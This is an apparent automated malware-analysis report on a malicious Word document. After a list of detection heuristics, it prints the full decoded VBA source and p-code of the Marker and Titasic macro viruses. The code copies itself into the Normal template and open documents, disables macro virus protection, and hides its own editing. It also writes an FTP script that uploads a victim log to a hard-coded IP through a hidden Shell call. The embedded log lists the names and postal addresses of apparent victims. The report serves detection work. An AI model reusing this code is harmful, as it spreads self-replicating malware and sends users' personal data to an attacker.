MALICIOUS
326
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The AutoOpen and Auto_Close macros, along with the critical OLE_VBA_SHELL heuristic, indicate malicious intent. The VBA script attempts to download a payload from the IP address '209.201.88.110' and save it as 'c:\netldx.vxd', which is a common technique for executing second-stage malware.
Heuristics 9
-
ClamAV: Doc.Trojan.Marker-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
AutoOpen -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Bare IPv4 address in VBA string literal (1 address) low OLE_VBA_BARE_IPV4_LITERALVBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://209.201.88.110 Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48902 bytes |
SHA-256: 1a9de8a78c209d0169a476dcae116f1de9ce6dc6cb5c91fcf8e0bcf35dd94679 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim AD, NT As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = AD.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = NT.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection on
Options.VirusProtection = True
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 11:16:41 AM - Wednesday, 23 Dec 1998
' BCBSA
'
' 01:30:35 PM - Wednesday, 30 Dec 1998
' BCBSA
'
' 01:36:45 PM - Monday, 4 Jan 1999
' Sue Rosinski
'
' 03:03:59 PM - Tuesday, 5 Jan 1999
' BCBSA
'
' 01:52:36 PM - Monday, 18 Jan 1999
' David W. Nelson
' Belden Enterprises, Inc.
' 1835 W. Roscoe St.
' Chicago, IL 60657
' 11:27:09 AM - Wednesday, 20 Jan 1999
' Tim Henthorn
'
' 10:34:42 AM - Thursday, 28 Jan 1999
' Shirley Moran
'
' 11:51:36 - Tuesday, 2 Feb 1999
' Jan Tissera
'
' 11:09:36 AM - Wednesday, 10 Feb 1999
' SALES AND MARKETING
'
' 03:58:57 PM - Friday, 12 Feb 1999
' FOOD & BEVERAGE
'
' 05:40:20 PM - Friday, 12 Feb 1999
' FOOD & BEVERAGE
'
' 12:18:32 AM - Wednesday, 1 Jan 1997
' Ricardo Calixto Gomecua
' FR. BENILDA GOMECUA
' 142 FORTUNA ST
' PASAY CITY M.M.
' PHILIPPINES
' 07:59:16 PM - Thursday, 4 Mar 1999
' john
'
' 10:28:43 AM - Tuesday, 9 Mar 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 05:30:17 PM - Sunday, 7 Mar 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 10:51:44 AM - Wednesday, 3 Feb 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 11:35:29 AM - Tuesday, 26 Jan 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 06:26:43 AM - Thursday, 18 Mar 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 06:36:03 PM - Saturday, 20 Mar 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 03:44:39 AM - Sunday, 4 Apr 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 02:05:58 PM - Tuesday, 6 Apr 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 02:49:10 PM - Saturday, 10 Apr 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 12:31:07 PM - Saturday, 16 Feb 1980
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 08:44:52 AM - Tuesday, 25 May 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
Private Sub ToggleButton1_Click()
End Sub
' 03:41:35 PM - Wednesday, 9 Jun 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 10:29:55 PM - Tuesday, 3 Aug 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 11:28:43 AM - Friday, 10 Sep 1999
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 10:45:00 AM - Friday, 8 Oct 1999
' San Miguel Brewing Philippines
'
' 01:23:48 PM - Wednesday, 24 Nov 1999
' polo
'
' 02:09:19 PM - Tuesday, 21 Dec 1999
' archie b. gupalor
'
' 10:06:09 AM - Friday, 10 Mar 2000
' Ulysses R. Gotera
' FoxChit SOFTWARE SOLUTIONS
' 04:46:18 PM - Saturday, 25 Mar 2000
' Bill Gates
'
' 12:39:44 PM - Friday, 27 Oct 2000
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 12:58:13 PM - Friday, 10 Nov 2000
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 01:45:41 PM - Wednesday, 15 Nov 2000
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
' 01:05:28 PM - Thursday, 8 Feb 2001
' OPEY A.
' CNNHS B'92 PHILIPPINES (CNSC)
Attribute VB_Name = "astia"
Public AD As Object, aDes As Variant
Public NonTitasic As Boolean, afound As Boolean, hapus As Boolean, reset As Boolean, aExc As Boolean, DocCount As Boolean
Function AstMaster()
Dim nmak(1) As String
Dim NT As Object
Dim aSrc$
On Error GoTo selesai
nmak(0) = "astia"
nmak(1) = "TITASIC"
aSrc = MacroContainer
Set NT = NormalTemplate
If Not DocCount Then
Set AD = ActiveDocument
ElseIf aSrc <> "SNrml.dot" Then
aSrc = NT
End If
If aSrc = NT Then
aSrc = NT.FullName: Set aDes = AD
ElseIf aSrc = AD Then
aSrc = AD.FullName: Set aDes = NT
ElseIf aSrc = "SNrml.dot" Then
Set aDes = NT
aSrc = Options.DefaultFilePath(8) & "\SNrml.src"
End If
Mhapus aDes
With aDes.VBProject
If Not (Not hapus And .Description = "astia" And .VBComponents.Count > 2) Then
Mcopy aSrc, aDes, nmak
hapus = False
.Description = "astia"
If aDes = NT Then
Options.SaveInterval = 1
CustomizationContext = NT
CommandBars("Tools").reset
KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
Command:="ToolsRecordMacroStart"
aDes.Save
End If
CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Aksi
End If
End With
If afound = True Then Exit Function
Refresh
On Error Resume Next
Aksi:
If aExc = True Then Exit Function
Exit Function
selesai:
If Err.Number = 50289 Then MsgBox "Terimakasih Anda Telah" & Chr(13) & "Memproteksi Word dengan Aman", vbInformation, "Titasic"
End Function
Sub Mhapus(Sfile)
Dim nmak As Object
For Each nmak In Sfile.VBProject.VBComponents
If nmak.Name = "NewMacros" Then NonTitasic = True
If nmak.Name <> "ThisDocument" And nmak.Name <> "NewMacros" _
And nmak.Name <> "astia" And nmak.Name <> "TITASIC" Then
hapus = True
If reset Then
Application.OrganizerDelete Sfile.FullName, nmak.Name, 3
Else
nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
End If
End If
Next nmak
End Sub
Sub Mcopy(Sfile, Dfile, nmak)
Dim aNmak
For Each aNmak In nmak
Application.OrganizerCopy Sfile, Dfile.FullName, aNmak, 3
Next
End Sub
Sub Action()
Documents.Add
On Error Resume Next
With ActiveWindow
.Caption = "Titasic"
.ActivePane.View.Zoom.Percentage = 100
.View.FullScreen = Not .View.FullScreen
.DisplayRulers = False
.DisplayHorizontalScrollBar = False
.DisplayVerticalRuler = False
.DisplayVerticalScrollBar = False
.View.ShowTextBoundaries = False
CommandBars("Full Screen").Position = 1
With CommandBars("Full Screen").Controls(1)
.Caption = "Titasic," & " " & Date
.Style = 3
.FaceId = 281
End With
.View.Type = 6
Randomize
With ActiveDocument.Background.Fill
.Visible = True
.PresetGradient Int((6 - 1 + 1) * Rnd + 1), 1, Int((24 - 1 + 1) * Rnd + 1)
End With
TITASIC.Show
.View.FullScreen = Not .View.FullScreen
End With
CommandBars("Full Screen").reset
WBT
ActiveDocument.Close 0
WBF
End Sub
Sub FileOpen()
WBT
If Dialogs(80).Show <> 0 Then
WBF
AutoOpen
Else
WBF
End If
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
AstMaster
If Documents.Count > 1 Then
For i = 1 To Documents.Count
If Documents(i).Name <> ActiveDocument.Name Then
Set AD = Documents(i)
DocCount = True
hapus = False
AstMaster
End If
Next
End If
If Now > DateSerial(1998, 9, 10) Then Application.OnTime When:=Now + TimeValue("00:45:00"), Name:="astia.Action"
End
End Sub
Sub ViewVbCode()
If MsgBox("Maaf.." & Chr(13) & "Anda jangan coba-coba mengedit, merubah, ataupun menghapus makro Titasic..!!" & Chr(13) & Chr(13) _
& "Anda hanya bisa merekam makro, menyimpan, menggunakan" & Chr(13) & "serta menghapus makro buatan Anda" & Chr(13) & Chr(13) & " Apakah Anda ingin merekam makro..?", vbExclamation + vbYesNo, "Titasic") _
= vbYes Then SendKeys "%m%s{down}~%d'Macro non-Titasic'%m"
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
aExc = True
AstMaster
WBT
AddIns.Unload False
WBF
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub AutoExit()
Dim aAddin As Object
On Error GoTo batal
WBT
If Documents.Count <> 0 Then Documents.Close
Options.DefaultFilePath(2) = Options.DefaultFilePath(6)
afound = True
For Each aAddin In AddIns
If aAddin.Name = "SNrml.dot" Then afound = False
Next aAddin
If afound = True Then
Application.Visible = False
Documents.Add
AstMaster
With ActiveDocument
.SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.src", FileFormat:=wdFormatDocument, AddToRecentFiles:=False
.SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False
End With
End If
Application.Quit
batal:
WBF
End Sub
Sub ToolsMacro()
WBF
On Error GoTo batal
Mhapus ActiveDocument
If NonTitasic Then
If MacroContainer = ActiveDocument Then Application.Run NormalTemplate.VBProject.Name & ".astia.ToolsMacro": Exit Sub
Application.DisplayAlerts = 0
With Dialogs(215)
.Description = "Macros Titasic mungkin tidak bisa Anda hapus, Anda hanya bisa menghapus makro buatan Anda (Descr: 'Makro non-Titasic')"
If .Display = 1 Then .Execute
End With
Application.DisplayAlerts = -1
Else
ViewVbCode
End If
batal:
End Sub
Sub FileTemplates()
WBF
If Not reset Then Dialogs(87).Display
End Sub
Sub FormatStyle()
WBF
Dialogs(180).Show
End Sub
Function Refresh()
reset = True
FileTemplates
Mhapus aDes
End Function
Sub AutoClose()
Application.DisplayAlerts = -1
With Options
.SaveNormalPrompt = False
.SaveInterval = 10
.VirusProtection = False
End With
If ActiveWindow.Caption <> "Titasic" And InStr(1, ActiveDocument.Name, "Docume", 1) = 0 _
And ActiveDocument.Name <> "SNrml.dot" Then AstMaster
End Sub
Sub FileExit()
AutoExit
End Sub
Sub ToolsOptions()
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
Dialogs(wdDialogToolsOptions).Show
Options.DefaultFilePath(wdUserTemplatesPath) = Application.Path
End Sub
Function WBT()
WordBasic.disableautomacros True
End Function
Function WBF()
WordBasic.disableautomacros False
End Function
' Processing file: /tmp/qstore_u0scdthl
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18741 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' OnError (Resume Next)
' Line #3:
' Line #4:
' Dim (Const)
' LitStr 0x0014 "<- this is a marker!"
' VarDefn Marker
' Line #5:
' Line #6:
' QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #7:
' Dim
' VarDefn SaveDocument
' VarDefn SaveNormalTemplate
' VarDefn DocumentInfected
' VarDefn NormalTemplateInfected (As Boolean)
' Line #8:
' Dim
' VarDefn AD
' VarDefn NT (As Object)
' Line #9:
' Dim
' VarDefn OurCode
' VarDefn UserAddress
' VarDefn LogData
' VarDefn LogFile (As String)
' Line #10:
' Line #11:
' QuoteRem 0x0000 0x0014 "Initialize Variables"
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set AD
' Line #13:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set NT
' Line #14:
' Line #15:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld AD
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DocumentInfected
' Line #16:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld NT
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St NormalTemplateInfected
' Line #17:
' Line #18:
' Line #19:
' QuoteRem 0x0000 0x001D "Switch the VirusProtection on"
' Line #20:
' LitVarSpecial (True)
' Ld Options
' MemSt VirusProtection
' Line #21:
' Line #22:
' Line #23:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0001
' Eq
' Paren
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "LogFile"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' And
' IfBlock
' Line #24:
' Line #25:
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld AD
' MemLd CodeModule
' MemLd CountOfLines
' Ld AD
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St LogData
' Line #27:
' Ld NormalTemplateInfected
' LitVarSpecial (True)
' Eq
' ElseIfBlock
' Line #28:
' LitDI2 0x0001
' Ld NT
' MemLd CodeModule
' MemLd CountOfLines
' Ld NT
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St LogData
' Line #29:
' EndIfBlock
' Line #30:
' Line #31:
' Ld LogData
' LitDI2 0x0001
' Ld LogData
' LitStr 0x0005 "' Log"
' LitStr 0x0008 "file -->"
' Concat
' FnInStr3
' Ld LogData
' FnLen
' LitDI2 0x0001
' Ld LogData
' LitStr 0x0005 "' Log"
' LitStr 0x0008 "file -->"
' Concat
' FnInStr3
' Sub
' ArgsLd Mid$ 0x0003
' St LogData
' Line #32:
' Line #33:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #34:
' Ld LogFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St LogFile
' Line #35:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #36:
' LitStr 0x0006 "C:\hsf"
' Ld LogFile
' Concat
' LitStr 0x0004 ".sys"
' Concat
' St LogFile
' Line #37:
' Line #38:
' Ld LogFile
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #39:
' LitDI2 0x0001
' Sharp
' PrintChan
' Ld LogData
' PrintItemNL
' Line #40:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #41:
' Line #42:
' LitStr 0x000D "c:\netldx.vxd"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #43:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "o 209.201.88.110"
' PrintItemNL
' Line #44:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #45:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #46:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "cd incoming"
' PrintItemNL
' Line #47:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0005 "ascii"
' PrintItemNL
' Line #48:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "put "
' Ld LogFile
' Concat
' PrintItemNL
' Line #49:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #50:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #51:
' Line #52:
' LitStr 0x002A "command.com /c ftp.exe -n -s:c:\netldx.vxd"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #53:
' Line #54:
' LitVarSpecial (True)
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "LogFile"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #55:
' Line #56:
' EndIfBlock
' Line #57:
' Line #58:
' Line #59:
' QuoteRem 0x0000 0x004D "Make sure that some conditions are true before we continue infecting anything"
' Line #60:
' LineCont 0x0008 0B 00 03 00 12 00 03 00
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' Ld NormalTemplateInfected
' LitVarSpecial (True)
' Eq
' Xor
' Paren
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' Paren
' And
' IfBlock
' Line #61:
' Line #62:
' Line #63:
' QuoteRem 0x0002 0x0019 "Infect the NormalTemplate"
' Line #64:
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #65:
' Line #66:
' Ld NormalTemplate
' MemLd Saved
' St SaveNormalTemplate
' Line #67:
' Line #68:
' LitDI2 0x0001
' Ld AD
' MemLd CodeModule
' MemLd CountOfLines
' Ld AD
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St OurCode
' Line #69:
' Line #70:
' Line #71:
' QuoteRem 0x0004 0x0031 "Write a log file of this NormalTemplate infection"
' Line #72:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Application
' MemLd UserAddress
' FnLen
' For
' Line #73:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Ne
' IfBlock
' Line #74:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Ne
' IfBlock
' Line #75:
' Ld UserAddress
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Concat
' St UserAddress
' Line #76:
' EndIfBlock
' Line #77:
' ElseBlock
' Line #78:
' Ld UserAddress
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' St UserAddress
' Line #79:
' EndIfBlock
' Line #80:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #81:
' Line #82:
' LineCont 0x0010 09 00 0E 00 12 00 15 00 1E 00 0E 00 29 00 0E 00
' Ld OurCode
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.